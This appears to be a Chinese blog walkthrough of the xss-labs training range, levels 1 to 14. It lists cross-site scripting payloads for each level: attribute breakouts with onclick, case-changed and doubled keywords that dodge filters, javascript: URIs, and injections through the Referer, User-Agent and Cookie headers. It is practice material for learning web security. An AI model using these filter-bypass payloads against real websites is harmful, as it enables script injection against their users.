目录
前言
level-1
1.1特点
1.2方法
level-2
1.1特点
1.2方法
level-3
1.1特点
1.2方法
level-4
1.1特点
1.2方法
level-5
1.1特点
1.2方法
level-6
1.1特点
1.2方法
level-7
1.1特点
1.2方法
level-8
1.1特点
1.2方法
level-9
1.1特点
1.2方法
level-10
1.1特点
1.2方法
level-11
1.1特点
1.2方法
level-12
1.1特点
1.2方法
level-13
1.1特点
1.2方法
level-14
1.1特点
1.2方法
入门级别的xss-labs靶场,有需要的自行下载搭建,搭建过程可以参考网上的资料-网络安全文档类资源-CSDN下载入门级别的xss-labs靶场,适合新入门的学生进行练习,希望你可以从中学习到一些解题的相关技巧和关更多下载资源、学习资料请访问CSDN下载频道.https://download.csdn.net/download/newlife1441/86265602
http://test/level1.php?name=aaa
#当然也可以输入其他的标签,都可以通关
aaa">
aaa">
'onclick='alert(1)#需要点击触发
"onclick="alert(1)#这里它使用双引号,所以我们也使用双引号闭合
">aa#需要点击触发
"ONCLICK="alert(1)#点击触发
"oonnclick="alert(1)#点击触发
">
javascript:alert(1)
不论输入什么还是闭合标签不会显示,查看源码,它使用了一个判断语句,根据内容我们需要输入'http://'开头的才能通过但是还是不可以,这里注意要把后面的注释掉才可以
javascript:alert(1)//http://
#先编码再注销
#方法一
http://test/level10.php?keyword=&t_sort="type="image" src=1 onerror=alert(1)//
#方法二需要点击触发
http://test/level10.php?keyword=&t_sort=" type="text" onclick=alert(1) //
#在Referer中输入(火狐插件hackbar)
&t_sort=a" type="text" onclick=alert(1) //
这里和之前的方法一样,惟一不同的是它这里使用了user agent,但是方法和前面一样
#在User Agent中输入(火狐插件hackbar)
a" type="text" onclick=alert(1) //
#在Cookies中输入(火狐插件hackbar)
user=a" type="text" onclick=alert(1) //
[靶场] XSS-Labs 14-20_3hex的博客-CSDN博客由于有FlashXSS,需要配置一下环境,下载Flash和JPEXS(Flash反编译工具)。14. Level14-图片EXIF注入这关卡的iframe引用的地址打不开,我们自己写一个简单的放在本地服务器上,引用对应的URL就行,同时需要打开php_exif开关。index.php放在根目录,URL为http://127.0.0.1 https://blog.csdn.net/qq_40929683/article/details/120422266